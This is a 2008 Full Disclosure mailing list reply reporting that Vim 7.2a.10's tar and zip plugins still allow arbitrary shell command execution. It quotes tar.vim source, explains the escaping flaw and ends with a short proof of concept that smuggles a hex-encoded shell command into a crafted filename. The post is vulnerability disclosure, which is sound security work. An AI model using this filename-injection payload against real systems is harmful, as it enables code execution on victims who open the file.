|
Full Disclosure
mailing list archives
Re: Collection of Vulnerabilities in Fully Patched Vim 7.1
From: "Jan Minář" <rdancer () rdancer org>
Date: Tue, 1 Jul 2008 20:36:29 +0100
On Sat, Jun 14, 2008 at 2:09 PM, Bram Moolenaar <Bram () moolenaar net> wrote:
Jan Minar wrote:
1. Summary
Product : Vim -- Vi IMproved
Version : Tested with 7.1.314 and 6.4
Impact : Arbitrary code execution
Wherefrom: Local and remote
Original : http://www.rdancer.org/vulnerablevim.html
Improper quoting in some parts of Vim written in the Vim Script can lead to
arbitrary code execution upon opening a crafted file.
Note that version 7.1.314, as reported in the Summary, does not have
most of the reported problems. The problems in the plugins have also
been fixed, this requires updating the runtime files. Information about
that can be found at http://www.vim.org/runtime.php
I do apologize: as written in the advisory, the version I worked with
was 7.1.298. 7.1.314 was only partly vulnerable. FWIW, I have
updated the advisory at http://www.rdancer.orgvulnerablevim.html .
Thanks to Bram for all the good work.
7.2a.10 with updated runtime is still vulnerable to the zipplugin
attack, and an updated tarplugin attack:
-------------------------------------------
-------- Test results below ---------------
-------------------------------------------
filetype.vim
strong : EXPLOIT FAILED
weak : EXPLOIT FAILED
tarplugin : EXPLOIT FAILED
tarplugin.updated: VULNERABLE
zipplugin : VULNERABLE
xpm.vim
xpm : EXPLOIT FAILED
xpm2 : EXPLOIT FAILED
remote : EXPLOIT FAILED
gzip_vim : EXPLOIT FAILED
netrw : EXPLOIT FAILED
The original tarplugin exploit now produces a string of telling error messages:
/bin/bash: so%: command not found
tar: /home/rdancer/vuln/vim/tarplugin/sploit/foo'|sosploit/foo:
Cannot open: No such file or directory
tar: Error is not recoverable: exiting now
/bin/bash: retu: command not found
/bin/bash: bar.tar|retu|'bar.tar: command not found
It's easy to see that it is still possible to execute arbitrary shell commands.
$VIMRUNTIME/autoload/tar.vim of Vim 7.2a.10:
136 if tarfile =~# '\.\(gz\|tgz\)$'
137 " call Decho("1: exe silent r! gzip -d -c
".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - ")
*138 exe "silent r! gzip -d -c -- ".s:Escape(tarfile)." |
".g:tar_cmd." -".g:tar_browseoptions." - "
139 elseif tarfile =~# '\.lrp'
140 " call Decho("2: exe silent r! cat --
".s:Escape(tarfile)."|gzip -d -c -|".g:tar_cmd."
-".g:tar_browseoptions." - ")
*141 exe "silent r! cat -- ".s:Escape(tarfile)."|gzip -d -c
-|".g:tar_cmd." -".g:tar_browseoptions." - "
142 elseif tarfile =~# '\.bz2$'
143 " call Decho("3: exe silent r! bzip2 -d -c
".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - ")
*144 exe "silent r! bzip2 -d -c -- ".s:Escape(tarfile)." |
".g:tar_cmd." -".g:tar_browseoptions." - "
145 else
146 " call Decho("4: exe silent r! ".g:tar_cmd."
-".g:tar_browseoptions." ".s:Escape(tarfile))
**147 exe "silent r! ".g:tar_cmd." -".g:tar_browseoptions."
".s:Escape(tarfile)
[...]
444 fun s:Escape(name)
445 " shellescape() was added by patch 7.0.111
446 if exists("*shellescape")
447 let qnameq= shellescape(a:name)
448 else
449 let qnameq= g:tar_shq . a:name . g:tar_shq
450 endif
451 return qnameq
452 endfun
(*) s:Escape() does not suffice, as it fails to escape ``%'' and friends.
(**) tar(1) allows arbitrary command execution via options ``--to-command'',
and ``--use-compress-program''.
The updated tarplugin attack is rather simple:
$ rm -rf ./*
$ touch "foo%;eval eval \`echo 0:64617465203e2070776e6564 |
xxd -r\`;'bar.tar"
$ vim +:q ./foo*
$ ls -l pwned
-rw-r--r-- 1 rdancer users 29 2008-07-01 20:18 pwned
Cheers,
Jan Minar.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
 By Date 
By Thread
Current thread:
- Re: Collection of Vulnerabilities in Fully Patched Vim 7.1 Jan Minář (Jul 01)
|
